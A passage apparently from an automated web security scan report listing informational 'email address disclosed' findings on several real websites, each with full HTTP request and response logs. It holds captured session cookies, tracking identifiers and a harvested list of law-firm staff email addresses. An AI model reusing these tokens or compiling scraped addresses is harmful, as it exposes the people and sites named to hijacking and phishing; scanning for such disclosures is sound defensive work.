Cookie: WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; THD_CACHE_NAV_PERSIST=C10%7e24%5f%7eC10%5fEXP%7e; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fTopseller%5fSort%7c1%5f%7eC26%5fEXP%7e; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308223600410%3a%3bC25%5fEXP%3d1360063600%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=oDMMetInv1iHYp16kefFhsmzBsk%3d%0a%3b2011%2d06%2d16+07%3a26%3a40%2e59%5f1308223600358%2d3348%5f10051; WC_ACTIVESTOREDATA=%2d1%2c10051; WC_USERSESSION_-1002=%2d1002%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002025830%5d%2c84UkZ5wI%2fVfXz0TN8b05L8WU9Mc%3d; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; 40M3=CT-1; s_pers=%20s_campaign%3Dno%2520value%7C1308225421778%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Ewalk%2520behind%2520mowers%7C1308225421780%3B%20p_30%3DSubcategory%7C1308225421782%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_cmpnm%3Dundefined%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Last-Modified: Wed, 11 May 2011 03:30:16 GMT
ETag: "1128-888-b0f04200"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 2184
Cache-Control: max-age=24467
Date: Thu, 16 Jun 2011 11:27:01 GMT
Connection: close

/*

   jQuery pub/sub plugin by Peter Higgins (dante@dojotoolkit.org)

   Loosely based on Dojo publish/subscribe API, limited in scope. Rewritten blindly.

   Original is (c) Dojo Foundation 2004-2010. Released under either AFL or new BSD, see:
   http://dojofoundation.org/
...[SNIP]...

18.24. http://www.homedepot.com/wcsstore/hdus/en_US/styles/jquery.fancybox-1.3.4.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.homedepot.com
Path:	/wcsstore/hdus/en_US/styles/jquery.fancybox-1.3.4.css

Issue detail

The following email address was disclosed in the response:

customercare@homedepot.com

Request

GET /wcsstore/hdus/en_US/styles/jquery.fancybox-1.3.4.css HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/webapp/wcs/stores/servlet/QuickViewService?langId=-1&storeId=10051&catalogId=10053&R=202642971&catEntryId=202642971
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=oDMMetInv1iHYp16kefFhsmzBsk%3d%0a%3b2011%2d06%2d16+07%3a26%3a40%2e59%5f1308223600358%2d3348%5f10051; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; s_pers=%20s_campaign%3Dno%2520value%7C1308225660593%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225660601%3B%20p_30%3DSubcategory%7C1308225660607%3B; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20s_sq%3D%3B%20SC_LINKS%3D%3B; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308223999999%3a%3bC25%5fEXP%3d1360063999%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_-1002=%2d1002%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002025830%5d%2c84UkZ5wI%2fVfXz0TN8b05L8WU9Mc%3d

Response

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Last-Modified: Mon, 09 Aug 2010 15:55:33 GMT
ETag: "188c-5fc1-beb6740"
Accept-Ranges: bytes
Content-Length: 24513
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: max-age=43199
Date: Thu, 16 Jun 2011 11:33:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<html xmlns="http://www
...[SNIP]...
<p>
If you have any questions, you can reach our web support team by email at customercare@homedepot.com
or by phone at 1-800-430-3376.</p>
...[SNIP]...

18.25. http://www.homedepot.com/wcsstore/hdus/scripts/DD_belatedPNG_0.0.8a-min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.homedepot.com
Path:	/wcsstore/hdus/scripts/DD_belatedPNG_0.0.8a-min.js

Issue detail

The following email address was disclosed in the response:

drew.diller@gmail.com

Request

GET /wcsstore/hdus/scripts/DD_belatedPNG_0.0.8a-min.js HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/webapp/wcs/stores/servlet/Navigation?storeId=10051&categoryID=556456&langId=-1&catalogId=10053&selectedCatgry=SEARCH%20ALL&navFlow=3&searchRedirect=lawn%20mower&Nu=P_PARENT_ID&locStoreNum=4501
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; THD_SESSION=C1%3d5%3a%3bC1%5fEXP%3d%2d1; THD_CACHE_NAV_PERSIST=C10%7e24%5f%7eC10%5fEXP%7e; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fTopseller%5fSort%7c1%5f%7eC26%5fEXP%7e; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308223600410%3a%3bC25%5fEXP%3d1360063600%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=oDMMetInv1iHYp16kefFhsmzBsk%3d%0a%3b2011%2d06%2d16+07%3a26%3a40%2e59%5f1308223600358%2d3348%5f10051; WC_ACTIVESTOREDATA=%2d1%2c10051; WC_USERSESSION_-1002=%2d1002%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002025830%5d%2c84UkZ5wI%2fVfXz0TN8b05L8WU9Mc%3d; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Last-Modified: Tue, 07 Jun 2011 17:15:24 GMT
ETag: "147fdd-1b77-5d8f8300"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 7031
Cache-Control: max-age=20933
Date: Thu, 16 Jun 2011 11:26:44 GMT
Connection: close

/**
* DD_belatedPNG: Adds IE6 support: PNG images for CSS background-image and HTML <IMG/>.
* Author: Drew Diller
* Email: drew.diller@gmail.com
* URL: http://www.dillerdesign.com/experiment/DD_belatedPNG/
* Version: 0.0.8a
* Licensed under the MIT License: http://dillerdesign.com/experiment/DD_belatedPNG/#license
*
* Example usage:
* DD
...[SNIP]...

18.26. http://www.homedepot.com/wcsstore/hdus/scripts/jquery.cookie.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.homedepot.com
Path:	/wcsstore/hdus/scripts/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

klaus.hartl@stilbuero.de

Request

GET /wcsstore/hdus/scripts/jquery.cookie.js HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/webapp/wcs/stores/servlet/QuickViewService?langId=-1&storeId=10051&catalogId=10053&R=202642971&catEntryId=202642971
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=oDMMetInv1iHYp16kefFhsmzBsk%3d%0a%3b2011%2d06%2d16+07%3a26%3a40%2e59%5f1308223600358%2d3348%5f10051; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; s_pers=%20s_campaign%3Dno%2520value%7C1308225660593%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225660601%3B%20p_30%3DSubcategory%7C1308225660607%3B; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20s_sq%3D%3B%20SC_LINKS%3D%3B; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308223999999%3a%3bC25%5fEXP%3d1360063999%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_-1002=%2d1002%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002025830%5d%2c84UkZ5wI%2fVfXz0TN8b05L8WU9Mc%3d

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Last-Modified: Tue, 07 Jun 2011 17:15:08 GMT
ETag: "28ae-ea0-5c9b5f00"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 3744
Cache-Control: max-age=18294
Date: Thu, 16 Jun 2011 11:33:21 GMT
Connection: close

/*jslint browser: true */ /*global jQuery: true */

/**
* jQuery Cookie plugin
*
* Copyright (c) 2010 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://ww
...[SNIP]...
ll be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given key.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String key The key of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function (key, value, options) {

// key and value given, set cookie...
if (arguments.length >
...[SNIP]...

18.27. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.homedepot.com
Path:	/webapp/wcs/stores/servlet/OrderCalculate

Issue detail

The following email address was disclosed in the response:

customercare@homedepot.com

Request

GET /webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224033585%3a%3bC25%5fEXP%3d1360064033%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227633772%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2crM8xlAEyyjuzBc2ZPDgFJlhwFMM%3d

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Content-Length: 207104
Expires: Thu, 16 Jun 2011 11:34:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 11:34:59 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224094066%3a%3bC25%5fEXP%3d1360064094%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:34:54 GMT;Path=/
Set-Cookie: THD_SESSION=C1%3d5%3a%3bC1%5fEXP%3d%2d1;Domain=.homedepot.com;Path=/
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%222%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%243%2c798%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816094%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224094066%3a%3bC25%5fEXP%3d1360064094%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:34:54 GMT;Path=/
Set-Cookie: WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227694814%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cufvYdumw7ZxHWtTtpzjDpT0%2bqW0%3d;Domain=.homedepot.com;Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<html xm
...[SNIP]...
<p>
               If you have any questions, you can reach our web support team by email at customercare@homedepot.com
               or by phone at 1-800-430-3376.
           </p>
...[SNIP]...

18.28. http://www.ilslaunch.com/sites/default/files/js/js_2518332c0b755f1d85c27c9500834ae3.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ilslaunch.com
Path:	/sites/default/files/js/js_2518332c0b755f1d85c27c9500834ae3.js

Issue detail

The following email addresses were disclosed in the response:

andreas.eberhard@gmail.com
pass@example.com
scott@filamentgroup.com

Request

GET /sites/default/files/js/js_2518332c0b755f1d85c27c9500834ae3.js HTTP/1.1
Host: www.ilslaunch.com
Proxy-Connection: keep-alive
Referer: http://www.ilslaunch.com/mission-control/mission-skyterra-1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS8d393e05f9096e5159d3f1d85acb4aa2=663g8gh6rfesig5han0apvb014

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 10:50:58 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 16 Jun 2011 07:00:52 GMT
ETag: "3da00de-225dc-d463d100"
Accept-Ranges: bytes
Content-Length: 140764
Cache-Control: max-age=1209600
Expires: Thu, 30 Jun 2011 10:50:58 GMT
Connection: close
Content-Type: application/x-javascript

// $Id: jquery.js,v 1.12.2.3 2008/06/25 09:38:39 goba Exp $

/*
* jQuery 1.2.6 - New Wave Javascript
*
* Copyright (c) 2008 John Resig (jquery.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
...[SNIP]...
<a href="http://user:pass@example.com">
...[SNIP]...
Drupal.settings.views.ajaxViews
} // if
};
;
/**
* --------------------------------------------------------------------
* jQuery-Plugin "pngFix"
* Version: 1.2, 09.03.2009
* by Andreas Eberhard, andreas.eberhard@gmail.com
* http://jquery.andreaseberhard.de/
*
* Copyright (c) 2007 Andreas Eberhard
* Licensed under GPL (http://www.opensource.org/licenses/gpl-license.php)
*
* Changelog:
* 09
...[SNIP]...
d @ from selectors
* 11.09.2007 Version 1.1
* - removed noConflict
* - added png-support for input type=image
* - 01.08.2007 CSS background-image support extension added by Scott Jehl, scott@filamentgroup.com, http://www.filamentgroup.com
* 31.05.2007 initial Version 1.0
* --------------------------------------------------------------------
* @example $(function(){$(document).pngFix();});
* @desc Fi
...[SNIP]...

18.29. http://www.inlandbusinesslaw.com/attorneyprofiles.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.inlandbusinesslaw.com
Path:	/attorneyprofiles.html

Issue detail

The following email addresses were disclosed in the response:

adavison@flsd.com
ahatti@flsd.com
blemann@flsd.com
cwilson@flsd.com
dcolella@flsd.com
dholden@flsd.com
lmadinger@flsd.com
mschaefer@flsd.com
tdominick@flsd.com

Request

GET /attorneyprofiles.html HTTP/1.1
Host: www.inlandbusinesslaw.com
Proxy-Connection: keep-alive
Referer: http://www.inlandbusinesslaw.com/
